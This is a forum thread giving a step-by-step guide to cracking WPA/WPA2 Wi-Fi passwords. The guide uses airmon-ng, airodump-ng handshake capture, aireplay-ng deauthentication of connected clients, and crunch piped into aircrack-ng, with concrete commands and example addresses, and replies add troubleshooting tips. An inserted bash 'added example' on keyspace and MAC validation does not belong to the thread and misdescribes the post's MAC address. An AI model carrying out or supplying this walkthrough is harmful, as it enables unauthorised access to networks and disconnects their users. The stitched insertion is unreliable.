Crunch & Aircrack-ng to Avoid Wordlists

Discussion in 'Dictionary, Password & Wordlists' started by mrmanuelmtz, 29 Aug 2012.

  1. mrmanuelmtz (Well-Known Member)

    Well, this post is because I am tired of these dictionary files that keep growing in size, to the point where they cease to be portable. So instead of buying a higher-capacity USB stick, I decided to do some research, and I think this is a great option to use as a last resort, since it is a brute-force method.

    So, as the title says, the programs to use are the aircrack-ng suite and crunch.

    That said...

    First we put our wireless card into monitor mode (open a root shell window):
    Code:
    airmon-ng start wlan0
    airodump-ng mon0        (the monitor interface may also be called ath1, etc.)
    • the card will start listening for networks; wait until your ESSID appears, and it has to be a WPA or WPA2 network
    • mine is INFINITUMCBA277, so select yours
    • now that you have the MAC address (BSSID) and the channel number (CH#):
    Code:
    airodump-ng -c CH# --bssid 'YOURMACADDRESS' -w ESSID mon0
    • it should look like this:
    Code:
    airodump-ng -c 6 --bssid 58:98:35:CB:A2:77 -w INFINITUMCBA277 mon0
    • now we either wait (possibly forever) for a handshake, or we deauthenticate a client to obtain one
    • in order to do that we need the client's MAC address:
    Code:
    aireplay-ng -0 10 -a 'YOURMACADDRESS' -c 'CLIENTSMACADDRESS' mon0
    • it should look like this:
    Code:
    aireplay-ng -0 10 -a 58:98:35:CB:A2:77 -c 70:D4:F2:91:AE:67 mon0
    • once the user is deauthenticated and reconnects, we'll obtain the handshake
    • if the command didn't work, well... try again (if nothing seems to happen after the deauthentication command, maybe you are too far from the client, because this command goes directly to the client's connection) :(
    • you will see something like: WPA handshake: 58:98:35:CB:A2:77
    • so now we use crunch
    • we will use the *.cap file where the handshake was saved
    • usually in Xiaopan OS it is in /home/tc/
    • so the syntax is:
    Code:
    crunch 8 8 0123456789 | aircrack-ng -a 2 'HOME-TC-FILE-CAP' -e 'ESSID' -b 'BSSID' -w -
    • it should look like this:
    Code:
    crunch 8 8 0123456789 | aircrack-ng -a 2 /home/tc/INFINITUMCBA277-02.cap -e INFINITUMCBA277 -b 58:98:35:CB:A2:77 -w -
    Then you just have to wait for crunch and aircrack-ng to check each combination.

    I highlight the last command because I want to explain it so you can adapt the program to your needs:

    Code:
    crunch 8 8 0123456789 | aircrack-ng -a 2 /home/tc/INFINITUMCBA277-02.cap -e INFINITUMCBA277 -b 58:98:35:CB:A2:77 -w -
    • First instruction: crunch is the wordlist generator:
      • crunch 8 8
    • Second: the '8 8' is the length of the word in characters; the first '8' is the starting length and the second '8' the ending length. So if you want to test your security with a 16-character password you can change it to '16 16', or '8 16'.
      • crunch 8 8 0123456789
    • Third: '0123456789' is the list of characters to include in the wordlist, for a numeric password. Note: 75% of users use numeric passwords. But you can also try something like '01234567890abcdefghijklf'; with an alphanumeric wordlist the time will increase, as this is a brute-force method.
      • 0123456789 | aircrack-ng
    • Fourth: this symbol is very important --> | <-- as it marks the end of the instructions for crunch and the start of the instructions for aircrack-ng.
    • Last but not least: the path to the .cap file has to be accurate.
    Well, there are a lot of programs that do things like this; I just like it better to do it myself :D. Well, this is it, let me know if you find this post useful.
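Before launching the brute force in the post above, it is worth knowing how big the keyspace is and checking the inputs, because a mistyped MAC or an impossible keyspace only shows up after hours of waiting. The following is an added example, not code from the original post or from the aircrack-ng/crunch projects: it computes the number of candidates crunch will emit for a given charset and length range and the worst-case run time at an assumed key rate (the 2000 keys/s figure is an assumption, not a number from the page; use the k/s value aircrack-ng prints while running on your own hardware), validates MAC addresses before they go into aireplay-ng/aircrack-ng (the client MAC as typed in the post, with a space after "70:", would be rejected), and shows that for the all-digit case seq produces exactly the candidate stream crunch does. The function names `keyspace`, `eta_hours`, `is_mac` and `numeric_candidates` are this example's own.

```shell
#!/usr/bin/env bash
# Added example, not part of mrmanuelmtz's post: sanity checks to run before
# "crunch ... | aircrack-ng ... -w -", plus a crunch-free generator for the
# all-digit case. RATE below is an assumption, not a figure from the page.

# Number of candidates crunch emits for a charset of CHARSET_SIZE symbols and
# lengths MIN..MAX: sum of CHARSET_SIZE^len. Repeated multiplication keeps every
# intermediate an exact integer in awk's doubles (all values here are < 2^53).
keyspace() {
  awk -v c="$1" -v lo="$2" -v hi="$3" 'BEGIN {
    total = 0; p = 1
    for (len = 1; len <= hi; len++) {
      p *= c
      if (len >= lo) total += p
    }
    printf "%.0f\n", total
  }'
}

# Worst-case hours to exhaust CANDIDATES at RATE keys per second.
eta_hours() {
  awk -v n="$1" -v r="$2" 'BEGIN { printf "%.1f\n", n / r / 3600 }'
}

# Accept only a well-formed colon-separated MAC, so a typo such as
# "70: D4:F2:91:AE:67" is caught before it reaches aireplay-ng -c / aircrack-ng -b.
is_mac() {
  printf '%s' "$1" | grep -Eq '^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$'
}

# Same candidate set as "crunch LEN LEN 0123456789", without crunch:
# zero-padded decimal numbers 0 .. 10^LEN-1 (needs a seq that accepts -f;
# GNU coreutils and BSD seq both do).
numeric_candidates() {
  local len="$1" max
  max=$(awk -v l="$len" 'BEGIN { m = 1; for (i = 0; i < l; i++) m *= 10; printf "%.0f", m - 1 }')
  seq -f "%0${len}.0f" 0 "$max"
}

# Assumed CPU rate in keys/s; replace with the k/s aircrack-ng shows on your machine.
RATE=2000
echo "8 digits (10 symbols): $(keyspace 10 8 8) candidates, $(eta_hours "$(keyspace 10 8 8)" "$RATE") h at ${RATE} k/s"
echo "8 alnum  (36 symbols): $(keyspace 36 8 8) candidates, $(eta_hours "$(keyspace 36 8 8)" "$RATE") h at ${RATE} k/s"

# Usage against the capture from the post (aircrack-ng must be installed; not run here):
#   is_mac 58:98:35:CB:A2:77 && numeric_candidates 8 | \
#     aircrack-ng -a 2 -e INFINITUMCBA277 -b 58:98:35:CB:A2:77 -w - /home/tc/INFINITUMCBA277-02.cap
```

The estimate is the useful part: 8 digits is 10^8 candidates, about 14 hours at 2000 keys/s, while 8 alphanumeric characters over 36 symbols is about 2.8 x 10^12, roughly 45 years at the same rate. That gap is why the post calls this a last resort, and why the charset argument to crunch matters far more than the tool used to generate the words.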
  2. Mr. Penguin (Administrator, Staff Member)

    Really impressive. I think this would interest hazz death quite a lot.
  3. hazz death (Well-Known Member, Dev Team VIP)

    Thanks for tagging me. Yes, it's really impressive! :D Thanks for sharing, mrmanuelmtz.
     
  4. ihack (Member)

    Just curious: the wifi that I was trying to crack had the CCMP cipher, so my question is whether it is possible to crack a network with a CCMP cipher using the above method, or does it have to be a WEP or TKIP cipher?
     
  5. mrmanuelmtz (Well-Known Member)

    Well, this method is for WPA/WPA2 networks, and CCMP is still WPA/WPA2. Just remember that this method is a brute force, so if you are looking to have a more secure network and your router supports it, set it to only beacon once a second; that should deter anyone trying to brute-force.
     
  6. easy1 (Member)

  7. nonameinthenet

    Thanks for the guide, I'll try this.
     
  8. vampiricbunny1800 (Well-Known Member, Dev Team VIP)

    Let me see if I am on the same page... when you say crunch and type the letters, it makes the list from them? So crunch 8 8 abc will make 8-letter words using only those 3 letters? Or did I misread something?
     
  9. ImJoJo (The One & Only, VIP)

  10. vampiricbunny1800 (Well-Known Member, Dev Team VIP)

    How fast is this, the same as a dictionary file or faster? I am currently hashing a 40 GB file... I have another 27 GB dictionary file... If this is faster I'd much prefer this. Also, can you do a BT (GNOME) walkthrough on it, or is it the same thing?
     
  11. mrmanuelmtz (Well-Known Member)

    A: yes, that's exactly how it works, but for a 3-letter combination you don't need a program :)
     
  12. tuyhin (Member)

    How do you type --> | <-- ?
     
  13. vampiricbunny1800 (Well-Known Member, Dev Team VIP)

    Thank you, that was informative. I will try that later; I will have to do all letters and numbers though, XD I have a HUGE password.
    --- Double Post Merged, 19 Nov 2012 ---
    @mrmanuelmtz, alt+179 = │
     
  14. estimacamry (Tracker, VIP)

    Guys,
    I managed to create a wordlist with Crunch. My passphrase is abkcmtshab. In order to shorten my pentest time I used:
    Code:
    /pentest/passwords/crunch/crunch 10 10 abchkmst -t abkc@@@@@@ -o <name.txt>
    The list is only 1 MB. After the 4-way handshake I started aircrack. Final result: Passphrase not in dictionary!
    How could this be? I double-checked to make sure abkcmtshab is in my txt file before starting aircrack. Anyone care to explain? :(
    Problem solved after running wpaclean on my cap file.
     
  15. x_mony (Guest)


    Hi mrmanuelmtz, I like your idea of crunch and aircrack instead of a wordlist, but I don't know when you are opening a new root shell each time. Can you specify when you open a new root shell? And where should the handshake appear? Please specify this to me also. And hey, thanks very much in advance.
     
  16. ImJoJo (The One & Only, VIP)

    | is on top of the "Enter" key, under the "Backspace" key, the same key where the \ backslash is. Shift + \ will give you |.
     
  17. x_mony (Guest)


    Aircrack started trying the PINs and everything worked fine, but when the current passphrase reached the same numbers as my password nothing happened and it continued trying combinations.
    --- Double Post Merged, 12 Dec 2012 ---
    Hi mrmanuelmtz, your method worked with my Ralink. Just wondering, does it work with the built-in wifi of the laptop? Thanks in advance.
     
  18. estimacamry (Tracker, VIP)

    x_mony,
    Clean up your cap file before starting aircrack:
    Code:
    wpaclean <out.cap> <in.cap>
     
  19. x_mony (Guest)


    Thanks for the reply.
    --- Double Post Merged, 9 Jan 2013 ---
    Hi, mrmanuelmtz said: "Well there's a lot of programs that do things like this, I just like it better to do it by myself :D." Does anyone know a program that uses crunch and aircrack-ng automatically, without the need to write all these commands? Thanks in advance.
     
  20. epitomize (Active Member)

    Can I put crunch on minidwep? ~_~
  • About Us: We are a community mixed with professionals and beginners with an interest in wireless security, auditing and pentesting.